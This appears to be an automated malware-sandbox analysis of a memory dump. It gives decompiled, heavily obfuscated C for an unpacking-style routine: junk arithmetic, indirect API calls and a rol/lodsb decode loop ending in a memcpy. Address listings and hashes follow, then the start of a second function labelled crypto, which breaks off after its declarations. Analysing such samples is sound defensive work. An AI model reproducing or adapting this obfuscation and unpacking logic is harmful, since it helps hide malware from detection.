			E02273FAB(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _t346;
				signed int _t351;
				signed int _t352;
				signed int _t355;
				void* _t359;
				void* _t361;
				signed int _t362;
				signed int _t367;
				void* _t369;
				void* _t370;
				signed int _t374;
				signed int _t377;
				signed int _t380;
				signed int _t385;
				void* _t387;
				void* _t389;
				intOrPtr _t390;
				void _t393;
				signed int _t397;
				intOrPtr _t403;
				signed int _t408;
				signed int _t410;
				signed int _t415;
				signed int _t418;
				void* _t420;
				signed int _t421;
				void* _t424;
				signed int _t429;
				signed int _t430;
				signed int _t433;
				void* _t437;
				void* _t439;
				signed int _t440;
				signed int _t443;
				intOrPtr _t445;
				signed int _t451;
				signed int _t454;
				signed int _t457;
				signed int _t459;
				signed int _t471;
				signed int _t473;
				signed int _t475;
				signed int _t478;
				void* _t481;
				signed int _t488;
				signed int _t489;
				signed int _t498;
				signed int _t500;
				signed int _t502;
				signed int _t504;
				signed int _t510;
				signed int _t513;
				void* _t514;
				signed int _t516;
				signed int _t519;
				signed int _t520;
				signed int _t525;
				signed int _t528;
				signed int _t530;
				signed int _t532;
				signed int _t534;
				signed int _t537;
				signed int _t540;
				signed int _t544;
				signed int _t548;
				signed int _t553;
				signed int _t559;
				signed int _t562;
				signed int _t565;
				void* _t570;
				void* _t577;
				signed int _t579;
				signed int _t582;
				signed int _t585;
				signed int _t590;
				void* _t591;
				signed int _t595;
				signed int _t598;
				signed int _t601;
				signed int _t604;
				signed int* _t608;
				signed int* _t609;
				signed int* _t610;
				signed int* _t611;
				signed int* _t612;
				signed int* _t613;
				signed int* _t614;
				signed int* _t615;
				signed int* _t616;
				signed int* _t617;
				signed int* _t621;
				signed int* _t622;
				signed int* _t623;

				_t585 = __esi;
				_t454 = __ebx;
				 *(_t598 - 0x1c) =  *(_t598 - 0x1c) & 0x00000000;
				_push( *(_t598 - 0x1c));
				 *_t608 =  *_t608 + __ebx + 0x41c4c0;
				_push( *((intOrPtr*)(__ebx + 0x41f060))());
				_pop( *_t6);
				_push( *(_t598 - 0x20));
				_pop( *_t8);
				_push(__ebx);
				 *_t608 =  *_t608 & 0x00000000;
				 *_t608 =  *_t608 | __ebx + 0x0041cf44;
				_push( *(_t598 - 0x1c));
				 *_t608 = __ebx + 0x41d05b;
				_t346 =  *((intOrPtr*)(__ebx + 0x41f060))();
				 *(_t598 - 0x1c) = __edi;
				 *(__ebx + 0x41cd5b) =  *(__ebx + 0x41cd5b) & 0x00000000;
				 *(__ebx + 0x41cd5b) =  *(__ebx + 0x41cd5b) ^ (__edi -  *(_t598 - 0x1c) | _t346);
				_t559 =  *(_t598 - 0x1c);
				_t609 = _t608 - 0xfffffffc;
				 *(_t598 - 0x1c) = 0;
				_push( *(_t598 - 0x1c));
				 *_t609 =  *_t609 |  *_t608;
				_push( *(_t598 - 0x1c));
				 *_t609 = __ebx + 0x41c0d0;
				 *(_t598 - 0x20) =  *(_t598 - 0x20) & 0x00000000;
				_push( *(_t598 - 0x20));
				 *_t609 =  *_t609 | __ebx + 0x0041c99a;
				_t351 =  *((intOrPtr*)(__ebx + 0x41f068))();
				 *(_t598 - 0x20) = __ecx;
				 *(__ebx + 0x41c6ff) = 0 ^ _t351;
				_t352 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push( *(_t598 - 0x1c));
				 *_t609 = _t352;
				_push(__edx);
				 *_t609 =  *_t609 ^ __edx;
				 *_t609 =  *_t609 ^ __ebx + 0x0041d1ce;
				 *(_t598 - 0x20) = 0;
				_push( *(_t598 - 0x20));
				 *_t609 =  *_t609 ^ __ebx + 0x0041c36e;
				_t355 =  *((intOrPtr*)(__ebx + 0x41f068))();
				 *(_t598 - 0x24) = __edx;
				 *(__ebx + 0x41c65d) = 0 ^ _t355;
				_t510 =  *(_t598 - 0x24);
				_t610 = _t609 - 0xfffffffc;
				 *(__ebx + 0x41c125) =  *(__ebx + 0x41c125) & 0x00000000;
				 *(__ebx + 0x41c125) =  *(__ebx + 0x41c125) | _t510 -  *_t610 ^ (_t355 & 0x00000000) +  *_t609;
				_t513 = _t510;
				_push(_t513);
				 *_t610 =  *_t610 & 0x00000000;
				 *_t610 =  *_t610 ^ __ebx + 0x0041c369;
				_t359 =  *((intOrPtr*)(__ebx + 0x41f060))();
				 *(_t598 - 0x24) = 0;
				_push( *(_t598 - 0x24));
				 *_t610 =  *_t610 + _t359;
				 *(_t598 - 0x24) = 0;
				_push( *(_t598 - 0x24));
				 *_t610 =  *_t610 ^ __ebx + 0x0041c4d6;
				_t361 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_t611 = _t610 - 0xfffffffc;
				 *_t611 =  *_t611 | _t513;
				_t514 = _t361;
				_t362 = _t514 + ( *(_t598 - 0x20) & 0x00000000 |  *_t610);
				_t516 = 0;
				 *_t611 = _t516;
				_t471 = 0 ^  *(__ebx + 0x41c434);
				_t519 = 0;
				if(_t471 > _t362) {
					_push(_t471);
					 *_t611 =  *_t611 ^ _t471;
					 *_t611 =  *_t611 + __ebx + 0x41c369;
					 *(_t598 - 0x1c) = 0;
					_push( *(_t598 - 0x1c));
					 *_t611 =  *_t611 ^ __ebx + 0x0041c4d6;
					_t362 =  *((intOrPtr*)(__ebx + 0x41f064))();
				}
				 *(_t454 + 0x41c391) =  *(_t454 + 0x41c391) & 0x00000000;
				 *(_t454 + 0x41c391) =  *(_t454 + 0x41c391) ^ _t598 ^  *_t611 ^ _t362;
				_t601 = _t598;
				if( *((intOrPtr*)(_t601 - 0x10)) != 2) {
					if( *((intOrPtr*)(_t601 - 0x10)) == 4) {
						_t156 = _t454 + 0x41d1be; // 0x41d1be
						 *_t611 = _t156;
						_t158 = _t454 + 0x41c0a8; // 0x41c0a8
						 *_t611 =  *_t611 & 0x00000000;
						 *_t611 =  *_t611 ^ _t158;
						_push( *((intOrPtr*)(_t454 + 0x41f068))(_t585,  *(_t601 - 0x24)));
						_pop( *_t160);
						_push( *(_t601 - 0x20));
						_pop( *_t162);
						 *((intOrPtr*)(_t601 - 8)) = 1;
						_t164 = _t454 + 0x41c6f8; // 0x41c6f8
						 *(_t601 - 0x20) =  *(_t601 - 0x20) & 0x00000000;
						 *_t611 =  *_t611 ^ _t164;
						_t408 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x20));
						 *(_t601 - 0x20) = _t519;
						 *(_t454 + 0x41c674) =  *(_t454 + 0x41c674) & 0x00000000;
						 *(_t454 + 0x41c674) =  *(_t454 + 0x41c674) | _t519 ^  *(_t601 - 0x20) | _t408;
						_t548 =  *(_t601 - 0x20);
						 *((intOrPtr*)(_t601 - 0xc)) = 0x55;
						_t177 = _t454 + 0x41c356; // 0x41c356
						 *(_t601 - 0x1c) =  *(_t601 - 0x1c) & 0x00000000;
						 *_t611 =  *_t611 | _t177;
						_t410 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x1c));
						 *(_t601 - 0x24) = _t559;
						 *(_t454 + 0x41cd7d) =  *(_t454 + 0x41cd7d) & 0x00000000;
						 *(_t454 + 0x41cd7d) =  *(_t454 + 0x41cd7d) | _t559 & 0x00000000 ^ _t410;
						_t559 =  *(_t601 - 0x24);
						 *((intOrPtr*)(_t601 - 0x18)) = 2;
						_t189 = _t454 + 0x41cc3e; // 0x41cc3e
						 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
						 *_t611 =  *_t611 ^ _t189;
						_t193 = _t454 + 0x41cf5b; // 0x41cf5b
						 *_t611 =  *_t611 ^ _t585;
						 *_t611 = _t193;
						_t362 =  *((intOrPtr*)(_t454 + 0x41f068))(_t585,  *(_t601 - 0x24));
						 *(_t601 - 0x20) = _t548;
						 *(_t454 + 0x41c1cd) =  *(_t454 + 0x41c1cd) & 0x00000000;
						 *(_t454 + 0x41c1cd) =  *(_t454 + 0x41c1cd) | _t548 & 0x00000000 | _t362;
						_t519 =  *(_t601 - 0x20);
					}
				} else {
					_t65 = _t454 + 0x41cb7a; // 0x41cb7a
					 *(_t601 - 0x1c) = 0;
					 *_t611 =  *_t611 + _t65;
					_t68 = _t454 + 0x41c8ec; // 0x41c8ec
					 *(_t601 - 0x24) = 0;
					 *_t611 =  *_t611 ^ _t68;
					_t415 =  *((intOrPtr*)(_t454 + 0x41f068))( *(_t601 - 0x24),  *(_t601 - 0x1c));
					 *(_t454 + 0x41c6f4) =  *(_t454 + 0x41c6f4) & 0x00000000;
					 *(_t454 + 0x41c6f4) =  *(_t454 + 0x41c6f4) ^ (_t585 & 0x00000000 | _t415);
					_t595 = _t585;
					_t76 = _t454 + 0x41c379; // 0x41c379
					 *(_t601 - 0x20) =  *(_t601 - 0x20) & 0x00000000;
					 *_t611 =  *_t611 + _t76;
					_t80 = _t454 + 0x41c532; // 0x41c532
					 *(_t601 - 0x20) =  *(_t601 - 0x20) & 0x00000000;
					 *_t611 =  *_t611 | _t80;
					_t418 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x20),  *(_t601 - 0x20));
					 *_t611 = _t418;
					_t86 = _t454 + 0x41d201; // 0x41d201
					 *_t611 = _t86;
					_t420 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x20),  *(_t601 - 0x24));
					_t498 = _t471 & 0x00000000 |  *_t611;
					_t621 =  &(_t611[1]);
					 *_t621 =  *_t621 + _t559;
					_t577 = _t420;
					_t421 = _t577 + _t498;
					_t579 = 0;
					_t500 = _t498 & 0x00000000 ^ (_t421 ^  *_t621 |  *(_t454 + 0x41cc21));
					_t424 = _t421;
					if(_t500 > _t424) {
						_t90 = _t454 + 0x41c532; // 0x41c532
						 *_t621 =  *_t621 & 0x00000000;
						 *_t621 =  *_t621 | _t90;
						_t91 = _t454 + 0x41d201; // 0x41d201
						 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
						 *_t621 =  *_t621 | _t91;
						_t451 =  *((intOrPtr*)(_t454 + 0x41f064))( *(_t601 - 0x24), _t519);
						 *(_t454 + 0x41d32e) =  *(_t454 + 0x41d32e) & 0x00000000;
						 *(_t454 + 0x41d32e) =  *(_t454 + 0x41d32e) | _t601 -  *_t621 ^ _t451;
						_t601 = _t601;
					}
					_t622 = _t621 - 0xfffffffc;
					 *_t622 =  *_t622 & 0x00000000;
					 *_t622 =  *_t622 |  *_t621;
					_t100 = _t454 + 0x41d01d; // 0x41d01d
					 *_t622 =  *_t622 ^ _t579;
					 *_t622 =  *_t622 | _t100;
					_t101 = _t454 + 0x41c37d; // 0x41c37d
					 *_t622 = _t101;
					_t429 =  *((intOrPtr*)(_t454 + 0x41f068))( *(_t601 - 0x1c), _t579, _t519);
					 *(_t601 - 0x20) = _t579;
					 *(_t454 + 0x41c9dc) =  *(_t454 + 0x41c9dc) & 0x00000000;
					 *(_t454 + 0x41c9dc) =  *(_t454 + 0x41c9dc) | _t579 & 0x00000000 | _t429;
					_t582 =  *(_t601 - 0x20);
					_t430 =  *((intOrPtr*)(_t454 + 0x41f060))();
					 *_t622 =  *_t622 ^ _t595;
					 *_t622 =  *_t622 | _t430;
					_t111 = _t454 + 0x41c8c2; // 0x41c8c2
					 *_t622 =  *_t622 - _t454;
					 *_t622 =  *_t622 + _t111;
					_t112 = _t454 + 0x41c737; // 0x41c737
					 *_t622 =  *_t622 & 0x00000000;
					 *_t622 =  *_t622 ^ _t112;
					_t433 =  *((intOrPtr*)(_t454 + 0x41f068))(_t582, _t454, _t595);
					 *_t114 = _t433;
					_push( *(_t601 - 0x20));
					_pop( *_t116);
					_t623 = _t622 - 0xfffffffc;
					 *(_t601 - 0x20) = _t582;
					 *(_t454 + 0x41c606) = _t433 & 0x00000000 |  *_t622;
					_t559 =  *(_t601 - 0x20);
					 *((intOrPtr*)(_t601 - 8)) = 3;
					_t121 = _t454 + 0x41d2fe; // 0x41d2fe
					 *(_t601 - 0x1c) = 0;
					 *_t623 =  *_t623 | _t121;
					_t437 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x1c));
					 *_t623 =  *_t623 ^ _t559;
					 *_t623 =  *_t623 + _t437;
					_t125 = _t454 + 0x41d22a; // 0x41d22a
					 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
					 *_t623 =  *_t623 | _t125;
					_t439 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x24), _t559);
					_t502 = _t500 & 0x00000000 |  *_t623;
					_t611 =  &(_t623[1]);
					 *(_t601 - 0x24) = _t519;
					_push(_t502 + _t439);
					_t553 =  *(_t601 - 0x24);
					_pop(_t440);
					 *(_t601 - 0x20) = _t440;
					_t504 = _t502 & 0x00000000 ^ (_t440 ^  *(_t601 - 0x20) |  *(_t454 + 0x41c48f));
					_t443 =  *(_t601 - 0x20);
					if(_t504 > _t443) {
						_t136 = _t454 + 0x41d2fe; // 0x41d2fe
						 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
						 *_t611 =  *_t611 + _t136;
						_t140 = _t454 + 0x41d22a; // 0x41d22a
						 *(_t601 - 0x20) = 0;
						 *_t611 =  *_t611 ^ _t140;
						_t443 =  *((intOrPtr*)(_t454 + 0x41f064))( *(_t601 - 0x20),  *(_t601 - 0x24));
					}
					 *_t611 = _t595;
					 *(_t454 + 0x41c2cf) = 0 ^ _t443;
					_t585 = 0;
					 *((intOrPtr*)(_t601 - 0xc)) = 0x11;
					_t146 = _t454 + 0x41d09f; // 0x41d09f
					 *_t611 =  *_t611 - _t559;
					 *_t611 =  *_t611 + _t146;
					_t445 =  *((intOrPtr*)(_t454 + 0x41f060))(_t559);
					 *(_t601 - 0x24) = _t504;
					 *((intOrPtr*)(_t454 + 0x41ce4e)) = _t445;
					_t471 =  *(_t601 - 0x24);
					 *((intOrPtr*)(_t601 - 0x18)) = 4;
					_t152 = _t454 + 0x41c4f7; // 0x41c4f7
					 *_t611 =  *_t611 ^ _t471;
					 *_t611 =  *_t611 + _t152;
					_t362 =  *((intOrPtr*)(_t454 + 0x41f060))(_t471);
					 *_t611 = _t553;
					 *(_t454 + 0x41c895) = 0 ^ _t362;
					_t519 = 0;
				}
				_t520 = _t519 ^ _t519;
				 *_t611 =  *_t611 - _t559;
				 *_t611 = _t520;
				_t201 = _t454 + 0x41c61d; // 0x41c61d
				 *_t611 =  *_t611 ^ _t585;
				 *_t611 = _t201;
				_t367 =  *((intOrPtr*)(_t454 + 0x41f060))(_t585, _t559, _t362);
				 *_t611 = _t367;
				_t204 = _t454 + 0x41cf67; // 0x41cf67
				 *(_t601 - 0x24) = 0;
				 *_t611 =  *_t611 ^ _t204;
				_t369 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x24),  *(_t601 - 0x1c));
				_pop( *_t208);
				_t473 = _t471 & 0x00000000 ^  *(_t601 - 0x24);
				 *(_t601 - 0x24) = _t559;
				_push(_t473 + _t369);
				_t562 =  *(_t601 - 0x24);
				_pop(_t370);
				_t475 = _t473 & 0x00000000 | _t601 & 0x00000000 ^  *(_t454 + 0x41c5dc);
				_t604 = _t601;
				if(_t475 > _t370) {
					_t213 = _t454 + 0x41c61d; // 0x41c61d
					 *(_t604 - 0x1c) = 0;
					 *_t611 =  *_t611 ^ _t213;
					_t216 = _t454 + 0x41cf67; // 0x41cf67
					 *(_t604 - 0x20) = 0;
					 *_t611 =  *_t611 | _t216;
					_t403 =  *((intOrPtr*)(_t454 + 0x41f064))( *(_t604 - 0x20),  *(_t604 - 0x1c));
					 *(_t604 - 0x1c) = _t475;
					 *((intOrPtr*)(_t454 + 0x41cf4f)) = _t403;
					_t475 =  *(_t604 - 0x1c);
				}
				_t612 =  &(_t611[1]);
				 *_t612 = _t475;
				_t478 = 0;
				 *_t612 = _t520 & 0x00000000 |  *_t611;
				_t225 = _t454 + 0x41cef6; // 0x41cef6
				 *(_t604 - 0x1c) =  *(_t604 - 0x1c) & 0x00000000;
				 *_t612 =  *_t612 | _t225;
				_t229 = _t454 + 0x41ceb9; // 0x41ceb9
				 *_t612 =  *_t612 ^ _t604;
				 *_t612 =  *_t612 ^ _t229;
				_t374 =  *((intOrPtr*)(_t454 + 0x41f068))(_t604,  *(_t604 - 0x1c),  *(_t604 - 0x24));
				 *(_t454 + 0x41caf5) =  *(_t454 + 0x41caf5) & 0x00000000;
				 *(_t454 + 0x41caf5) =  *(_t454 + 0x41caf5) | _t478 ^  *_t612 | _t374;
				_t481 = _t478;
				_t613 = _t612 - 0xfffffffc;
				_t525 = _t374 %  *(_t604 - 0x18);
				 *_t613 =  *_t613 & 0x00000000;
				 *_t613 =  *_t613 | _t525;
				_t241 = _t454 + 0x41c52d; // 0x41c52d
				 *(_t604 - 0x24) = 0;
				 *_t613 =  *_t613 ^ _t241;
				_t377 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t604 - 0x24), _t481);
				 *(_t454 + 0x41d106) =  *(_t454 + 0x41d106) & 0x00000000;
				 *(_t454 + 0x41d106) =  *(_t454 + 0x41d106) | _t525 & 0x00000000 | _t377;
				_t528 = _t525;
				_t530 = _t528 & 0x00000000 ^  *_t613;
				_t614 = _t613 - 0xfffffffc;
				 *((intOrPtr*)(_t604 - 4)) =  *((intOrPtr*)(_t604 - 4)) - _t530;
				 *(_t604 - 0x24) = 0;
				 *_t614 =  *_t614 | _t530;
				_t253 = _t454 + 0x41c7ee; // 0x41c7ee
				 *_t614 =  *_t614 ^ _t562;
				 *_t614 =  *_t614 ^ _t253;
				_t254 = _t454 + 0x41c513; // 0x41c513
				 *(_t604 - 0x20) = 0;
				 *_t614 =  *_t614 | _t254;
				_t380 =  *((intOrPtr*)(_t454 + 0x41f068))( *(_t604 - 0x20), _t562,  *(_t604 - 0x24), _t481);
				 *(_t604 - 0x20) = _t585;
				 *(_t454 + 0x41c2a8) =  *(_t454 + 0x41c2a8) & 0x00000000;
				 *(_t454 + 0x41c2a8) =  *(_t454 + 0x41c2a8) ^ _t585 & 0x00000000 ^ _t380;
				_t532 =  *_t614;
				_t615 =  &(_t614[1]);
				 *(_t604 - 0x1c) = _t380;
				 *(_t604 - 0x14) =  *(_t604 - 0x14) & 0x00000000;
				 *(_t604 - 0x14) =  *(_t604 - 0x14) | _t380 ^  *(_t604 - 0x1c) ^ _t532;
				_t271 = _t454 + 0x41ccc7; // 0x41ccc7
				 *(_t604 - 0x24) = 0;
				 *_t615 =  *_t615 | _t271;
				_t385 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t604 - 0x24));
				 *(_t454 + 0x41cca4) =  *(_t454 + 0x41cca4) & 0x00000000;
				 *(_t454 + 0x41cca4) =  *(_t454 + 0x41cca4) | _t562 -  *_t615 | _t385;
				_t565 = _t562;
				_t590 =  *(_t604 - 0x20) & 0x00000000 ^ _t454 & 0x00000000 ^  *(_t604 + 8);
				_t457 = _t454;
				_t280 = _t457 + 0x41c550; // 0x41c550
				 *(_t604 - 0x20) = 0;
				 *_t615 =  *_t615 + _t280;
				_t387 =  *((intOrPtr*)(_t457 + 0x41f060))( *(_t604 - 0x20));
				 *(_t604 - 0x20) = 0;
				 *_t615 =  *_t615 + _t387;
				_t286 = _t457 + 0x41d34c; // 0x41d34c
				 *_t615 = _t286;
				_t389 =  *((intOrPtr*)(_t457 + 0x41f060))( *(_t604 - 0x20),  *(_t604 - 0x20));
				_t616 = _t615 - 0xfffffffc;
				 *_t289 = _t389;
				 *(_t604 - 0x24) =  *(_t604 - 0x24) + (0 ^  *_t615);
				_push( *(_t604 - 0x24));
				_pop(_t390);
				_t534 = _t532;
				 *(_t604 - 0x1c) = _t534;
				_t537 =  *(_t604 - 0x1c);
				if( *((intOrPtr*)(_t457 + 0x41ccf8)) > _t390) {
					_t296 = _t457 + 0x41c550; // 0x41c550
					 *(_t604 - 0x1c) =  *(_t604 - 0x1c) & 0x00000000;
					 *_t616 =  *_t616 + _t296;
					_t300 = _t457 + 0x41d34c; // 0x41d34c
					 *(_t604 - 0x1c) =  *(_t604 - 0x1c) & 0x00000000;
					 *_t616 =  *_t616 + _t300;
					_t390 =  *((intOrPtr*)(_t457 + 0x41f064))( *(_t604 - 0x1c),  *(_t604 - 0x1c));
				}
				 *(_t604 - 0x24) = _t537;
				 *((intOrPtr*)(_t457 + 0x41ce46)) = _t390;
				_t540 =  *(_t604 - 0x24);
				 *(_t604 - 0x1c) = _t540;
				_t310 = _t457 + 0x41cb9d; // 0x41cb9d
				 *_t616 =  *_t616 - _t590;
				 *_t616 =  *_t616 | _t310;
				_t311 = _t457 + 0x41cd17; // 0x41cd17
				 *(_t604 - 0x20) =  *(_t604 - 0x20) & 0x00000000;
				 *_t616 =  *_t616 | _t311;
				_t393 =  *((intOrPtr*)(_t457 + 0x41f068))( *(_t604 - 0x20), _t590);
				 *_t616 = _t565 & 0x00000000 | _t540 & 0x00000000 ^ _t590;
				 *(_t457 + 0x41d015) = 0 ^ _t393;
				_t570 = 0;
				_t591 = _t590 - 1;
				 *(_t604 - 0x1c) = 0;
				_push( *(_t604 - 0x1c));
				 *_t616 =  *_t616 | _t457;
				do {
					 *_t319 = _t570;
					_t488 =  *(_t604 - 0x20);
					_t489 = _t488 &  *(_t604 - 8);
					if(_t489 == 0) {
						_t591 = _t591 + 1;
						_t393 = _t393 & 0x00000000 ^ (_t570 -  *_t616 |  *(_t604 - 0x18));
						_t570 = _t570;
						_t457 =  *(_t393 + _t591) & 0x000000ff;
					}
					 *_t325 =  *((intOrPtr*)(_t604 - 0xc));
					_t544 =  *(_t604 - 0x20);
					asm("rol edx, cl");
					asm("lodsb");
					_t393 = _t393 | _t544 & _t457;
					 *_t570 = _t393;
					_t570 = _t570 + 1;
					_t327 = _t604 - 4;
					 *_t327 =  *((intOrPtr*)(_t604 - 4)) - 1;
				} while ( *_t327 != 0);
				_t459 =  *_t616;
				_t617 =  &(_t616[1]);
				_t329 = _t459 + 0x41cc0b; // 0x41cc0b
				 *_t617 =  *_t617 & 0x00000000;
				 *_t617 =  *_t617 ^ _t329;
				_t330 = _t459 + 0x41cbd0; // 0x41cbd0
				 *_t617 =  *_t617 & 0x00000000;
				 *_t617 =  *_t617 | _t330;
				_t397 =  *((intOrPtr*)(_t459 + 0x41f068))(_t604, _t489);
				 *(_t604 - 0x20) = _t489;
				 *(_t459 + 0x41d326) =  *(_t459 + 0x41d326) & 0x00000000;
				 *(_t459 + 0x41d326) =  *(_t459 + 0x41d326) ^ (_t489 ^  *(_t604 - 0x20) | _t397);
				 *(_t604 - 0x1c) = _t459;
				return memcpy(_t570, _t591 + 1,  *(_t604 - 0x14));
			}

0x02273fab
0x02273fab
0x02273fb1
0x02273fb5
0x02273fb8
0x02273fc1
0x02273fc2
0x02273fc5
0x02273fc8
0x02273fd4
0x02273fd5
0x02273fd9
0x02273fe2
0x02273fe5
0x02273fe8
0x02273fee
0x02273ff6
0x02273ffd
0x02274003
0x0227400b
0x0227400e
0x02274015
0x02274018
0x02274021
0x02274024
0x0227402d
0x02274031
0x02274034
0x02274037
0x0227403d
0x02274044
0x0227404d
0x02274053
0x02274056
0x0227405f
0x02274060
0x02274063
0x0227406c
0x02274073
0x02274076
0x02274079
0x0227407f
0x02274086
0x0227408c
0x02274098
0x022740a1
0x022740a8
0x022740ae
0x022740b5
0x022740b6
0x022740ba
0x022740bd
0x022740c3
0x022740ca
0x022740cd
0x022740d6
0x022740dd
0x022740e0
0x022740e3
0x022740f2
0x022740f7
0x022740fb
0x022740fe
0x02274100
0x02274103
0x0227410e
0x02274110
0x02274113
0x0227411b
0x0227411c
0x0227411f
0x02274128
0x0227412f
0x02274132
0x02274135
0x02274135
0x02274141
0x02274148
0x0227414e
0x02274153
0x0227446d
0x02274473
0x0227447c
0x0227447f
0x02274486
0x0227448a
0x02274493
0x02274494
0x02274497
0x0227449a
0x022744a0
0x022744a7
0x022744ad
0x022744b4
0x022744b7
0x022744bd
0x022744c5
0x022744cc
0x022744d2
0x022744d5
0x022744dc
0x022744e2
0x022744e9
0x022744ec
0x022744f2
0x022744fa
0x02274501
0x02274507
0x0227450a
0x02274511
0x02274517
0x0227451e
0x02274521
0x02274528
0x0227452b
0x0227452e
0x02274534
0x0227453c
0x02274543
0x02274549
0x02274549
0x02274159
0x02274159
0x0227415f
0x02274169
0x0227416c
0x02274172
0x0227417c
0x0227417f
0x0227418b
0x02274192
0x02274198
0x02274199
0x0227419f
0x022741a6
0x022741a9
0x022741af
0x022741b6
0x022741b9
0x022741c2
0x022741c5
0x022741ce
0x022741d1
0x022741dd
0x022741e0
0x022741e5
0x022741e9
0x022741ec
0x022741ee
0x022741fc
0x022741fe
0x02274201
0x02274203
0x0227420a
0x0227420e
0x02274211
0x02274217
0x0227421e
0x02274221
0x0227422d
0x02274234
0x0227423a
0x0227423a
0x02274240
0x02274244
0x02274248
0x0227424b
0x02274252
0x02274255
0x02274258
0x02274261
0x02274264
0x0227426a
0x02274272
0x02274279
0x0227427f
0x02274282
0x02274289
0x0227428c
0x0227428f
0x02274296
0x02274299
0x0227429c
0x022742a3
0x022742a7
0x022742aa
0x022742b1
0x022742b4
0x022742b7
0x022742c6
0x022742c9
0x022742d0
0x022742d6
0x022742d9
0x022742e0
0x022742e6
0x022742f0
0x022742f3
0x022742fa
0x022742fd
0x02274300
0x02274306
0x0227430d
0x02274310
0x0227431c
0x0227431f
0x02274322
0x02274329
0x0227432a
0x0227432d
0x0227432e
0x0227433d
0x0227433f
0x02274344
0x02274346
0x0227434c
0x02274353
0x02274356
0x0227435c
0x02274366
0x02274369
0x02274369
0x02274371
0x02274378
0x0227437e
0x0227437f
0x02274386
0x0227438d
0x02274390
0x02274393
0x02274399
0x022743a0
0x022743a6
0x022743a9
0x022743b0
0x022743b7
0x022743ba
0x022743bd
0x022743c5
0x022743cc
0x022743d2
0x022743d2
0x02274551
0x02274555
0x02274558
0x0227455b
0x02274562
0x02274565
0x02274568
0x02274571
0x02274574
0x0227457a
0x02274584
0x02274587
0x02274593
0x02274596
0x02274599
0x022745a0
0x022745a1
0x022745a4
0x022745b2
0x022745b4
0x022745b7
0x022745b9
0x022745bf
0x022745c9
0x022745cc
0x022745d2
0x022745dc
0x022745df
0x022745e5
0x022745ec
0x022745f2
0x022745f2
0x022745fe
0x02274603
0x0227460d
0x02274611
0x02274614
0x0227461a
0x02274621
0x02274624
0x0227462b
0x0227462e
0x02274631
0x0227463d
0x02274644
0x0227464a
0x02274654
0x02274657
0x0227465b
0x0227465f
0x02274662
0x02274668
0x02274672
0x02274675
0x02274681
0x02274688
0x0227468e
0x02274695
0x02274698
0x022746a1
0x022746a5
0x022746af
0x022746b2
0x022746b9
0x022746bc
0x022746bf
0x022746c5
0x022746cf
0x022746d2
0x022746d8
0x022746e0
0x022746e7
0x022746f2
0x022746f5
0x022746f8
0x02274700
0x02274704
0x0227470a
0x02274710
0x0227471a
0x0227471d
0x02274729
0x02274730
0x02274736
0x02274741
0x02274743
0x02274744
0x0227474a
0x02274754
0x02274757
0x0227475d
0x02274767
0x0227476a
0x02274773
0x02274776
0x02274781
0x02274788
0x0227478b
0x0227478e
0x02274791
0x02274792
0x02274793
0x022747a0
0x022747a5
0x022747a7
0x022747ad
0x022747b4
0x022747b7
0x022747bd
0x022747c4
0x022747c7
0x022747c7
0x022747cd
0x022747d4
0x022747da
0x022747dd
0x022747ed
0x022747f4
0x022747f7
0x022747fa
0x02274800
0x02274807
0x0227480a
0x02274812
0x02274819
0x0227481f
0x02274820
0x02274821
0x02274828
0x0227482b
0x0227482e
0x0227482f
0x02274835
0x02274836
0x02274839
0x0227483b
0x02274846
0x02274848
0x02274849
0x02274849
0x02274850
0x02274856
0x02274857
0x0227485b
0x0227485c
0x0227485e
0x02274860
0x02274861
0x02274861
0x02274861
0x02274868
0x0227486b
0x0227486e
0x02274875
0x02274879
0x0227487c
0x02274883
0x02274887
0x0227488a
0x02274890
0x02274898
0x0227489f
0x022748a8
0x022748c1

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e380f32c42c4f0e1bdcf2094019efc4a4f59e296a005b21612e1bc21532986cf
Instruction ID: fa7baa8db077899d521c31fc6972a48ce922e09eebbf50eddbe1515110cfa06c
Opcode Fuzzy Hash: e380f32c42c4f0e1bdcf2094019efc4a4f59e296a005b21612e1bc21532986cf
Instruction Fuzzy Hash: 3A4225728442088FEF04EFA4C8897EEBBF1FF48310F19856ED889AA155D7385525CF69

Uniqueness

Uniqueness Score: -1.00%

Function 02271CD0, Relevance: .6, Instructions: 565
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E02271CD0(void* __ebx, signed int __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t326;
				signed int _t329;
				void* _t331;
				void* _t332;
				signed int _t336;
				signed int _t339;
				signed int _t344;
				signed int _t345;
				signed int _t348;
				intOrPtr _t353;
				signed int _t356;
				signed int _t359;
				void* _t361;
				void* _t362;
				signed int _t367;
				signed int _t368;
				signed int _t370;
				void* _t372;
				void* _t373;
				void* _t377;
				intOrPtr _t378;
				intOrPtr _t380;
				signed int _t382;
				signed int _t385;
				signed int _t387;
				void* _t389;
				signed int _t390;
				signed int _t392;
				signed int _t395;
				void* _t397;
				void* _t399;
				signed int _t400;
				signed int _t415;
				signed int _t418;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t427;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t444;
				signed int _t446;
				signed int _t453;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t467;
				signed int _t470;
